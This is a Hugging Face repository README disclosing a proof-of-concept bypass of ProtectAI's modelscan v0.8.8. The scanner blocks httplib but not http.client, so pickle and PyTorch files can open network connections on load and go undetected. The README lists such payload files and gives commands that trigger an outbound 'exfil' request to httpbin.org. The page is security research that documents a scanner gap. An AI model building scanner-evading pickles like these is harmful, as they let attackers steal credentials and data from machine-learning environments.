Hugging Face's logo

manja316
/
modelscan-http-client-ssrf

PyTorch
security-research
modelscan-bypass
Model card Files
xet
 Community
modelscan-http-client-ssrf / README.md
manja316's picture
manja316
Upload README.md with huggingface_hub
8bf9a59 verified
preview code
|
raw
history blame contribute delete
1.17 kB
metadata 
tags:
  - security-research
  - modelscan-bypass
license: mit

ModelScan Bypass PoC: http.client SSRF

Security research only. Do not use maliciously.

This repository demonstrates a bypass in ProtectAI's modelscan scanner (v0.8.8).

Vulnerability

modelscan blocks httplib (Python 2 module name) in its unsafe_globals list, but does NOT block http.client (the Python 3 equivalent module).

This allows creation of pickle files that:

  1. Create HTTP/HTTPS connections to arbitrary servers
  2. Send HTTP requests with attacker-controlled data
  3. Exfiltrate data from the model loading environment

All while modelscan reports "No issues found".

Files

  • model.pkl — Pickle file that sends an HTTP GET request on load
  • pytorch_model.bin — Same payload in PyTorch format

Reproduction 

pip install modelscan==0.8.8
modelscan scan -p model.pkl
# Output: "No issues found"

python3 -c "import pickle; pickle.loads(open('model.pkl','rb').read())"
# Sends HTTP request to httpbin.org/get?exfil=pwned

Impact

  • SSRF from model loading
  • Data exfiltration from ML environments
  • Credential theft via outbound HTTP requests